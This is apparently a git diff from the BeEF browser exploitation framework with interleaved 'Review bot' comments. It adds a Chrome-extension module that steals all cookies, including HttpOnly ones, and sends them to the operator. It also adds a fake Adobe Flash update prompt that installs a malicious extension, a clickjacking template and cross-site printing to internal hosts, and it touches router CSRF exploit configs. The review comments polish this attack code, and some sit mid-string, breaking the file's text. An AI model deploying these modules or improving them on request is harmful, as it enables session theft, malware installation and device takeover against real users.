encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies)); + }) + } else { + chrome.cookies.getAll({}, function(cookies){ + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies)); + }) + } + +}); + diff --git a/modules/chrome_extensions/get_all_cookies/config.yaml b/modules/chrome_extensions/get_all_cookies/config.yaml new file mode 100755 index 000000000..04cc73ebd --- /dev/null +++ b/modules/chrome_extensions/get_all_cookies/config.yaml 
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ get_all_cookies:
+ enable: true
+ category: "Chrome Extensions"
+ name: "Get All Cookies"
+ description: "Steal cookies, even HttpOnly cookies, providing the hooked extension has cookies access.
 If a URL is not specified then all cookies are returned (this can be a lot!)"
+ authors: ["mh"]
+ target:
+ working: ["C"]
+ not_working: ["All"]
diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb
new file mode 100755
index 000000000..362e62d4f
--- /dev/null
+++ b/modules/chrome_extensions/get_all_cookies/module.rb
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Get_all_cookies < BeEF::Core::Command
+
+ def self.options
+
+ return [
+ {'name' =>'url', 'ui_label'=>'Domain (e.g. http://facebook.com)', 'value' => 'default_all'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['Return'] = @datastore['return']
+ save content
+ end
+
+end
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
index 2920b7a84..af3d4a3f0 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
@@ -19,7 +19,7 @@ beef:
 module:
 Dlink_dcs_series_csrf:
 enable: true
- category: ["Exploits","Camera"]
+ category: ["Exploits", "Camera"]
 name: "Dlink DCS series CSRF"
 description: "Attempts to change the password on a Dlink DCS series camera."
 authors: ["bcoles"]
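Review bot: `post_execute` reads `@datastore['return']`, but the command script fragment visible earlier in this diff reports its data as `'cookies: ' + JSON.stringify(cookies)`, so the key the handler derives from that string presumably never equals `'return'` and the saved content will be empty; confirm how the handler splits results and align the two sides, following the `key=value` form the cross_site_printing script in this diff uses (`'result=...'`, read back as `@datastore['result']`). The `url` option's `'default_all'` sentinel has no `description`; a one-line hint such as `'description' => 'Domain to filter on, or default_all for every cookie'` would tell the operator what it means. The explicit `return` in `self.options` is redundant since the array literal is already the method's last expression.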
diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml
index 022045eb9..39034eba7 100644
--- a/modules/exploits/router/bt_home_hub_csrf/config.yaml
+++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 bt_home_hub_csrf:
 enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
 name: "BT Home Hub CSRF"
 description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router."
 authors: ["bcoles"]
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
index b502288f1..c579a47b9 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 comtrend_ct5367_csrf:
 enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
 name: "Comtrend CT-5367 CSRF"
 description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router."
 authors: ["bcoles"]
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
index fe71d96bf..27f47c06e 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 comtrend_ct5624_csrf:
 enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
 name: "Comtrend CT-5624 CSRF"
 description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router."
 authors: ["bcoles"]
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
index aab56869a..d7e6ace24 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
+++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 dlink_dsl500t_csrf:
 enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
 name: "D-Link DSL500T CSRF"
 description: "Attempts to change the password on a D-Link DSL500T router."
 authors: ["bcoles"]
diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml
index 0ccbe8c1d..d12a65130 100644
--- a/modules/exploits/router/huawei_smartax_mt880/config.yaml
+++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 Huawei_smartax_mt880_csrf:
 enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
 name: "Huawei SmartAX MT880 CSRF"
 description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router."
 authors: ["bcoles"]
diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
index 790045b2f..d3308de95 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml
+++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 linksys_befsr41_csrf:
 enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
 name: "Linksys BEFSR41 CSRF"
 description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router."
 authors: ["Martin Barbella"]
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
index de9c1162d..a64dd89fd 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 linksys_wrt54g2_csrf:
 enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
 name: "Linksys WRT54G2 CSRF"
 description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router."
 authors: ["Martin Barbella"]
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
index a85f8d5f4..4129d26e1 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 linksys_wrt54g_csrf:
 enable: true
- category: ["Exploits","Router"]
+ category: ["Exploits", "Router"]
 name: "Linksys WRT54G CSRF"
 description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router."
 authors: ["Martin Barbella"]
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
index 42798a2d3..6402686d4 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
+++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 Netgear_gs108t_csrf:
 enable: true
- category: ["Exploits","Switch"]
+ category: ["Exploits", "Switch"]
 name: "Netgear GS108T CSRF"
 description: "Attempts to change the password on a Netgear GS108T managed switch."
 authors: ["Bart Leppens"]
diff --git a/modules/ipec/cross_site_printing/command.js b/modules/ipec/cross_site_printing/command.js
new file mode 100644
index 000000000..49a0ef690
--- /dev/null
+++ b/modules/ipec/cross_site_printing/command.js
@@ -0,0 +1,69 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var target_ip = "<%= @ip %>";
+ var target_port = "<%= @port %>";
+
+ // send a request
+ function send_msg(ip, port) {
+
+ // create iframe
+ var iframe = document.createElement("iframe");
+ iframe.setAttribute("id","ipc_cross_site_printing_<%= @command_id %>");
+ iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
+ document.body.appendChild(iframe);
+ iframe = document.getElementById("ipc_cross_site_printing_<%= @command_id %>");
+
+ // create form
+ var action = "http://" + ip + ":" + port + "/";
+ myform=document.createElement("form");
+ myform.setAttribute("name","data");
+ myform.setAttribute("method","post");
+ myform.setAttribute("enctype","multipart/form-data");
+ myform.setAttribute("action",action);
+ iframe.contentWindow.document.body.appendChild(myform);
+
+ // create message textarea
+ myExt = document.createElement("textarea");
+ myExt.setAttribute("id","msg_<%= @command_id %>");
+ myExt.setAttribute("name","msg_<%= @command_id %>");
+ myExt.setAttribute("wrap","none");
+ myExt.setAttribute("rows","70");
+ myExt.setAttribute("cols","100");
+ myform.appendChild(myExt);
+
+ // send message
+ iframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>";
+ myform.submit();
+
+ // clean up
+ 
setTimeout('document.body.removeChild(document.getElementById("ipc_cross_site_printing_<%= @command_id %>"));', 15000);
+ }
+
+ // validate target
+ if (!target_port || !target_ip || isNaN(target_port)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
+ } else if (target_port > 65535 || target_port < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+ // send request and wait for reply
+ } else {
+ send_msg(target_ip, target_port);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
+ }
+
+});
+
diff --git a/modules/ipec/cross_site_printing/config.yaml b/modules/ipec/cross_site_printing/config.yaml
new file mode 100644
index 000000000..370b690bd
--- /dev/null
+++ b/modules/ipec/cross_site_printing/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ cross_site_printing:
+ enable: true
+ category: "IPEC"
+ name: "Cross-Site Printing (XSP)"
+ description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send a message to a listening print port (9100 by default) on the target specified in the 'Target Address' input field.
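Review bot: The message is inlined into a JavaScript string literal on the `// send message` line after escaping only double quotes and newlines, so a message containing a backslash (for example the two characters `\"`) is rendered as `\\"`, which ends the literal early and breaks the whole script; escaping backslashes before the quote substitution, or emitting the value through a JSON encoder (`.value = <%= @msg.to_json %>;` if the JSON library is available in this template context), handles backslashes, quotes and line breaks together. `myform` and `myExt` are assigned without `var` and so become globals on the hooked page; `var myform = document.createElement("form");` and `var myExt = document.createElement("textarea");` keep them local to `send_msg`. The range check `target_port < 0` also admits port 0, which is not a usable TCP port; `target_port < 1` matches the validity message.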

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+ authors: ["bcoles"]
+ target:
+ working: ["FF"]
diff --git a/modules/ipec/cross_site_printing/module.rb b/modules/ipec/cross_site_printing/module.rb
new file mode 100644
index 000000000..e74227dee
--- /dev/null
+++ b/modules/ipec/cross_site_printing/module.rb
@@ -0,0 +1,77 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Cross_site_printing < BeEF::Core::Command + + def self.options + return [ + {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, + {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '9100'}, + {'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"********************************************************************** + + .O, + lkOl + od cOc + 'X, cOo. + cX, ,dkc. + BeEF ;Kd. ,odo,. + .dXl . .:xkl' + 'OKc .;c' ,oOk: + ,kKo. .cOkc. .lOk:. + .dXx. :KWKo. 'dXd. + .oXx. cXWW0c..dXd. + oW0 .OWWWNd.'KK. + ....,;lkNWx KWWWWX:'XK. + ,o:, .,:odkO00XNK0Okxdlc,. .KWWWWWWddWd + K::Ol .:d0NXK0OkxdoxO' .lXWWWWWWWWKW0 + od d0. .l0NKOxdooooooox0. .,cdOXWWWWWWWWWWWWWx + :O ;K; ;kN0kooooooooooooK: .':ok0NWWWWWWWWWWWWWWWWWWK. + 'X .Kl ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd. + .N. o. .Kl 'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l. + 0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:. + lX.,WN: .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo. + 0O.0WWk' .XKoooooooooooONWWNo dWWWWWWWWWWWWWWWWWl + oKkNWWWX00NWXdooooooooxXWWNk' dWWWWWWWWWWWWWWWWX + .cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW: + .;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX. 
+ 'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd + oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO + ;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx + ;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX. + .NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX' + :KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk. + .xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk' + OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl. + ,Wk xWWWWWWWWd xWWNWWWWWWWWWWWWXOdc,. + .N0 lOXNX0x; .KWWWWWWWWWWWNkc. + :NO, 'lXWWWWWWWWWNk:. + .dXN0OkxkO0NWWWWWWWWWWKl. + .';o0WWWWWWWWWWWNk; + .cxOKXKKOd;. + +**********************************************************************", 'width'=>'200px' }, + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] if not @datastore['result'].nil? + content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? + if content.empty? + content['fail'] = 'No data was returned.' + end + save content + end +end diff --git a/modules/misc/iframe_sniffer/config.yaml b/modules/misc/iframe_sniffer/config.yaml index 0fc20b8fa..61c796fa1 100644 --- a/modules/misc/iframe_sniffer/config.yaml +++ b/modules/misc/iframe_sniffer/config.yaml @@ -19,7 +19,8 @@ beef: enable: true category: "Misc" name: "iFrame Sniffer" - description: "This module attempts to do framesniffing (aka Leaky Frame). It will append leakyframe.js (written by Paul Stone) to the DOM and check for specified anchors to be present on a url.
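Review bot: `post_execute` guards its two datastore reads with `if not ….nil?`, which idiomatic Ruby writes as a modifier `unless`: `content['result'] = @datastore['result'] unless @datastore['result'].nil?` and `content['fail'] = @datastore['fail'] unless @datastore['fail'].nil?`. The explicit `return [` in `self.options` is redundant because the array is the method's last expression. The roughly 45-line ASCII-art default for the `msg` option is embedded inline in the options hash, which makes `self.options` hard to read; a frozen class-level constant built from a non-squiggly heredoc (so the art's leading spaces survive) would keep the method short. Both methods start and end inside this hunk.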
For more information, refer to http://www.contextis.co.uk/research/blog/framesniffing/" + description: "This module attempts to do framesniffing (aka Leaky Frame). It will append leakyframe.js (written by Paul Stone) to the DOM and check for specified anchors to be present on a URL.
For more information, refer to http://www.contextis.co.uk/research/blog/framesniffing/" authors: ["Bart Leppens"] target: - working: "S" + working: ["S", "IE"] + not_working: ["ALL"] diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js new file mode 100644 index 000000000..70985c019 --- /dev/null +++ b/modules/social_engineering/clickjacking/command.js 
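Review bot: `working: ["S", "IE"]` and the new `not_working: ["ALL"]` line overlap, so the target section now says two contradictory things about Safari and IE. Which entry wins presumably depends on the order in which the module loader evaluates the target keys; if the intent is "only Safari and IE", dropping the `not_working` line, or narrowing it to the browsers actually known to fail, states that unambiguously.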
@@ -0,0 +1,92 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var offset_top = "<%= @offset_top %>"; + var offset_left = "<%= @offset_left %>"; + var url = "<%= @url %>"; + var debug = <%= @debug %>; + + if (debug) opacity = 10; else opacity = 0; + + // create container + var cjcontainer = document.createElement('div'); + cjcontainer.id = "cjcontainer"; + cjcontainer.setAttribute("style", "-moz-opacity:"+opacity); + cjcontainer.style.zIndex = 999; + cjcontainer.style.border = "none"; + cjcontainer.style.width = "30px"; + cjcontainer.style.height = "20px"; + cjcontainer.style.overflow = "hidden"; + cjcontainer.style.position = "absolute"; + cjcontainer.style.opacity = opacity; + cjcontainer.style.filter = "alpha(opacity="+opacity+")"; + cjcontainer.style.cursor = "default"; + document.body.appendChild(cjcontainer); + + // create iframe + var cjiframe = document.createElement('iframe'); + cjiframe.id = "cjiframe"; + cjiframe.src = url; + cjiframe.scrolling = "no"; + cjiframe.frameBorder = "0"; + cjiframe.allowTransparency = "true"; + cjiframe.style.overflow = "hidden"; + cjiframe.style.position = "absolute"; + cjiframe.style.top = offset_top+"px"; + cjiframe.style.left = offset_left+"px"; + cjiframe.style.width = "200px"; + cjiframe.style.height = "100px"; + cjiframe.style.border = "none"; + cjiframe.style.cursor = "default"; + cjcontainer.appendChild(cjiframe); + + // 
followmouse code by rsnake + // http://ha.ckers.org/weird/followmouse.html + // modified by bcoles + function followmouse(e){ + + var xcoord = 0; + var ycoord = 0; + var gettrailobj = function() { + if (document.getElementById) + return document.getElementById("cjcontainer").style; + else if (document.all) + return document.all.container.style; + } + if (typeof e != "undefined") { + xcoord += e.pageX - 10; + ycoord += e.pageY - 15; + } else if (typeof window.event != "undefined") { + xcoord += document.body.scrollLeft + event.clientX; + ycoord += document.body.scrollTop + event.clientY; + } + var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15; + var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight) + gettrailobj().left = xcoord + "px"; + gettrailobj().top = ycoord + "px"; + } + + // hook to mousemove event + if (window.addEventListener) { + window.addEventListener('mousemove', followmouse, false); + } else if (window.attachEvent) { + window.attachEvent('mousemove', followmouse); + } + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event'); + +}); diff --git a/modules/social_engineering/clickjacking/config.yaml b/modules/social_engineering/clickjacking/config.yaml new file mode 100644 index 000000000..0d9d51248 --- /dev/null +++ b/modules/social_engineering/clickjacking/config.yaml 
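Review bot: `opacity` is assigned on the `if (debug) opacity = 10; else opacity = 0;` line without `var`, so it becomes an implicit global on the page the callback runs in; `var opacity = debug ? 10 : 0;` keeps it local to the `beef.execute` callback. In `followmouse`, `docwidth` and `docheight` are computed from the document dimensions but never read afterwards, so the `var docwidth = …` and `var docheight = …` lines can be dropped (the second also lacks a terminating semicolon). The `gettrailobj` helper is re-created on every mousemove event; hoisting it out of `followmouse` avoids the per-event allocation.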
@@ -0,0 +1,27 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + clickjacking: + enable: true + category: "Social Engineering" + name: "Clickjacking" + description: "This module serves as a template for clickjacking attacks.
Simply specify the target URL and the offset (in pixels) for the iframe content. The iframe will follow the mouse cursor.
Debug mode creates a visible iframe for testing purposes."
+ authors: ["bcoles"]
+ target:
+ user_notify: ["FF", "C"]
+ not_working: ["IE"]
+
diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb
new file mode 100644
index 000000000..c005d87c5
--- /dev/null
+++ b/modules/social_engineering/clickjacking/module.rb
@@ -0,0 +1,35 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Clickjacking < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjack.html"
+ return [
+ { 'name' => 'url', 'description' => 'Target URL', 'ui_label' => 'Target URL', 'value' => uri, 'width'=>'400px' },
+ { 'name' => 'offset_top', 'description' => 'Offset Top (in pixels)', 'ui_label' => 'Offset Top (px)', 'value' => '-40', 'width'=>'150px' },
+ { 'name' => 'offset_left', 'description' => 'Offset Left (in pixels)', 'ui_label' => 'Offset Left (px)', 'value' => '-10', 'width'=>'150px' },
+ { 'name' => 'debug', 'type' => 'combobox', 'ui_label' => 'Debug Mode', 'store_type' => 'arraystore', 'store_fields' => ['debug'], 'store_data' => [['true'],['false']], 'valueField' => 'debug', 'value' => 'false', editable: false, 'displayField' => 'debug', 'mode' => 'local', 'autoWidth' => true }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['clickjack'] = @datastore['clickjack']
+ save content
+ end
+
+end
diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
new file mode 100644
index 000000000..c86e73fce
--- /dev/null
+++ b/modules/social_engineering/fake_flash_update/command.js
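Review bot: The `debug` option hash mixes a symbol key, `editable: false`, into a hash whose every other key is a string; if the UI layer reads option attributes by string key, as `'value'`, `'mode'` and `'autoWidth'` suggest, this entry is silently ignored and the combobox stays editable, so it should be `'editable' => false`. `post_execute` stores `@datastore['clickjack']` with no nil check, unlike the sibling Cross_site_printing module added in this commit, which skips nil entries and falls back to a `'fail'` message; `content['clickjack'] = @datastore['clickjack'] unless @datastore['clickjack'].nil?` would make the two consistent. The explicit `return [` in `self.options` is redundant since the array is the last expression.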
@@ -0,0 +1,33 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ // Grab image and payload from config
+ image = "<%== @image %>";
+ payload = "<%== @payload %>";
+
+ // Add div to page
+ div = document.createElement('div');
+ div.setAttribute('id', 'splash');
+ div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
+ div.setAttribute('align', 'center');
+ document.body.appendChild(div);
+ div.innerHTML= '';
+ $j("#splash").click(function () {
+ $j(this).hide();
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
+ });
+});
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
new file mode 100644
index 000000000..78131d2c4
--- /dev/null
+++ b/modules/social_engineering/fake_flash_update/config.yaml
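Review bot: `image`, `payload` and `div` are assigned without `var` inside the `beef.execute` callback, so all three become globals on the page the callback runs in and can collide with identifiers the page already defines; declare them as `var image = "<%== @image %>";`, `var payload = "<%== @payload %>";` and `var div = document.createElement('div');`. The `// Grab image and payload from config` comment is accurate but the two values are interpolated with `<%==` (unescaped) into JavaScript string literals, so the module-level docs should state that these option values are expected to be plain URLs without quote characters.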
@@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + fake_flash_update: + enable: true + category: "Social Engineering" + name: "Fake Flash Update" + description: "Prompts the user to install an update to Adobe Flash Player.
The default install file is a Chrome extension.

A chrome extenstion has privileged access and can do a whole lot..
  • - Access all tabs and inject beef into all tabs
  • - Use hooked browser as a proxy to do cross domain requests
  • - Get all cookies including HTTPonly cookies

See chrome extensions beef modules for more examples
See extensions/demos/flash_update_chrome_extension for extension source"
+ authors: ["mh"]
+ target:
+ user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
new file mode 100644
index 000000000..58e05d06d
--- /dev/null
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -0,0 +1,38 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Fake_flash_update < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ payload = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.crx"
+ image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
+
+ return [
+ {'name' =>'payload', 'description' =>'Location of the chrome extension that user is promted to install', 'ui_label'=>'Chrome extension', 'value' => payload},
+ {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}
+
+ ]
+ end
+
+ #
+ # This method is being called when a zombie sends some
+ # data back to the framework.
+ #
+ def post_execute
+ save({'answer' => @datastore['answer']})
+ end
+
+end
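Review bot: The `payload` option's `description` string misspells "prompted" as `promted`; this text is shown in the module UI, so change it to `'Location of the chrome extension that user is promted to install'` → `'Location of the chrome extension that user is prompted to install'`. The `return [` in `self.options` is redundant since the array is the last expression, and the blank line between the `image` entry and the closing `]` looks accidental. The header comment on `post_execute` could name what is stored, e.g. `# Persists the 'answer' value that command.js sends back once the splash image is clicked.`, instead of the generic "data back to the framework".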
